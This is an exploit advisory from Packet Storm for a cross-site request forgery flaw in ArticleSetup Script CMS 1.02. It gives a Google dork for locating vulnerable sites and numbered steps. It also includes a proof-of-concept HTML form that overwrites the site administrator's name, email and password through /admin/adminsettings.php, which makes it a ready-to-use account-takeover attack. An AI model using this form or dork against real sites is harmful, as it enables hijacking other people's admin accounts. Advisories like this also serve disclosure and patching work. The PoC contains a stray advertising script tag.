ArticleSetup Script CMS version 1.02 suffers from a cross site request forgery vulnerability.
81a94c8ac47ab696c3c9dc187d2cd857d00d66d82cbc371eed6630cff1133fbf====================================================================================================================================
| # Title : ArticleSetup Script cms V1.02 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://articlesynergy.com/ |
| # Dork : intext:"© 2011 - Article Setup" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code Update admin informations .
[+] Go to the line 6.
[+] Set the target site link Save changes and apply .
[+] infected file : /admin/adminsettings.php .
[+] http://127.0.0.1/q7art/admin/adminsettings.php
[+] save code as poc.html .
<h2>Update Your Admin Settings</h2>
<div class="block">
<p style="padding-left: 15px; color: red;">Settings updated!</p>
<form style="padding-left: 15px;" name="submission" enctype="multipart/form-data" method="POST" action="http://127.0.0.1/articles3nichesiteorg/admin/adminsettings.php">
<b>Name:</b><br>
<input name="name" style="width: 250px;" value="Administrator" type="text">
<b>Email:</b><br>
<input name="email" style="width: 250px;" value="indoushka4ever@gmail.com" type="text">
<b>New Password:</b><br>
<p>(Leave the password fields blank to retain old password)</p>
<input name="pass1" style="width: 250px;" type="password">
<b>New Password (again):</b><br>
<input name="pass2" style="width: 250px;" type="password">
<div style="clear:both"></div>
<input name="update" id="update" type="hidden">
<button type="submit" id="submitstyle" name="save" class="button_colour round_all"><img alt="Bended Arrow Right" src="http://articles3.nichesite.org/admin/images/icons/small/white/Bended Arrow Right.png" width="24" height="24"><span>Update Settings</span></button>
<script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
</form>
====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed